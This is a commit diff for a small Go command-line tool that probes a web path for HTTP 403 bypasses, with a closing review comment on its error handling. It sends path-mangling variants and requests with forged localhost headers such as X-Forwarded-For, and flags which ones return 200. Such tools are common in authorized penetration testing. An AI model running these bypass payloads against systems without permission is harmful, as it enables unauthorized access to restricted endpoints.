Merge pull request #1 from ClavinJune/main

Improve Code, Add Goroutine
main
Muhammad Daffa 2021-07-18 19:52:23 +07:00 committed by GitHub
commit 9c1edf9fc7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 125 additions and 73 deletions

2
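--- a/Makefile
+++ b/Makefile
@@ -0,0 +1,2 @@
+fmt:
+@gofmt -w -s main.go && goimports -w main.go && go vet main.go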

196
main.go

@ -1,46 +1,21 @@
package main package main
import ( import (
"context"
"flag" "flag"
"fmt" "fmt"
"log" "log"
"net/http" "net/http"
"os" "regexp"
"runtime"
"strings" "strings"
"sync"
"time"
) )
var Red = "\033[31m" var (
var Green = "\033[32m" reURL = regexp.MustCompile("^https?://")
var White = "\033[97m" headerPayloads = []string{
func main() {
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
os.Exit(0)
}
upperCase := strings.ToUpper(*path)
endpoint := []string{
*domain + "/" + upperCase,
*domain + "/" + *path + "/",
*domain + "/" + *path + "/.",
*domain + "//" + *path + "//",
*domain + "/./" + *path + "/./",
*domain + "/./" + *path + "/..",
*domain + "/;/" + *path,
*domain + "/.;/" + *path,
*domain + "//;//" + *path,
*domain + "/" + *path + "..;/",
*domain + "/%2e/" + *path,
*domain + "/%252e/" + *path,
*domain + "/%ef%bc%8f" + *path}
headers := []string{
"X-Custom-IP-Authorization", "X-Custom-IP-Authorization",
"X-Originating-IP", "X-Originating-IP",
"X-Forwarded-For", "X-Forwarded-For",
@ -49,52 +24,127 @@ func main() {
"X-Host", "X-Host",
"X-Forwarded-Host", "X-Forwarded-Host",
"X-ProxyUser-Ip", "X-ProxyUser-Ip",
"X-Remote-Addr"} "X-Remote-Addr",
}
)
fmt.Println(Green, " _ _ ___ ____ ____ ") const (
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ") version string = "v1.1.0"
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ") red string = "\033[31m"
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ") green string = "\033[32m"
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ") white string = "\033[97m"
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
fmt.Println(Green, " __/ | | ")
fmt.Println(Green, " |___/|_| v1.0.2", White)
fmt.Println("\nDomain:", *domain) headerValue string = "127.0.0.1"
fmt.Println("Path:", *path) )
fmt.Println("\nNormal Request") func showBanner() {
for i, str := range endpoint { fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
req, err := http.Get(str) " _ _ ___ ____ ____\n",
if err != nil { "| || | / _ \\___ \\ | _ \\\n",
log.Fatal(err) "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
} "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode)) " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
if req.StatusCode == 200 { " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
fmt.Println(Green, i+1, output, White) " __/ | |\n",
} else { " |___/|_| ",
fmt.Println(Red, i+1, output, White) version, white)
} }
func getValidDomain(domain string) string {
trimmedDomain := strings.TrimSpace(domain)
if !reURL.MatchString(trimmedDomain) {
trimmedDomain = "https://" + trimmedDomain
} }
fmt.Println("\nRequest with Headers") return trimmedDomain
for j, head := range headers { }
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
if err != nil {
log.Fatal(err)
}
req2.Header.Set(head, "127.0.0.1")
resp, err := http.DefaultClient.Do(req2)
if err != nil {
log.Fatal(err)
}
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
if resp.StatusCode == 200 { func constructEndpointPayloads(domain, path string) []string {
fmt.Println(Green, j+1, output2, White) return []string{
} else { domain + "/" + strings.ToUpper(path),
fmt.Println(Red, j+1, output2, White) domain + "/" + path + "/",
} domain + "/" + path + "/.",
domain + "//" + path + "//",
domain + "/./" + path + "/./",
domain + "/./" + path + "/..",
domain + "/;/" + path,
domain + "/.;/" + path,
domain + "//;//" + path,
domain + "/" + path + "..;/",
domain + "/%2e/" + path,
domain + "/%252e/" + path,
domain + "/%ef%bc%8f" + path,
} }
} }
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
defer cancel()
defer wg.Done()
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
if err != nil {
log.Fatal(err)
}
var h string
if header != nil {
h = header[0]
req.Header.Set(h, headerValue)
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
log.Fatal(err)
}
defer resp.Body.Close()
color := green
if resp.StatusCode != 200 {
color = red
}
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
}
func main() {
runtime.GOMAXPROCS(1)
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
}
validDomain := getValidDomain(*domain)
validPath := strings.TrimSpace(*path)
endpoints := constructEndpointPayloads(validDomain, validPath)
showBanner()
fmt.Println("\nDomain:", validDomain)
fmt.Println("Path:", validPath)
fmt.Println("\nNormal Request")
var wg sync.WaitGroup
wg.Add(len(endpoints))
for _, e := range endpoints {
go penetrateEndpoint(&wg, e)
}
wg.Wait()
fmt.Println("\nRequest with Headers")
wg.Add(len(headerPayloads))
for _, h := range headerPayloads {
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
}
wg.Wait()
}
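Review bot: Both error branches in `penetrateEndpoint` call `log.Fatal(err)`, and the function now runs as a goroutine, so one timeout or connection error on a single request exits the whole process and discards the results of every request still in flight. `log.Fatal` ends in `os.Exit(1)`, so the deferred `cancel()`, `wg.Done()` and `resp.Body.Close()` do not run either. Report the failure for that URL and carry on: in the `http.DefaultClient.Do` branch use `log.Println(red, h, url, err, white)` followed by `return`. The `http.NewRequestWithContext` branch can log `url` and `err` the same way; `h` is not yet declared there. With that change a run always prints one line per request, which makes a partial or flaky result distinguishable from a clean one.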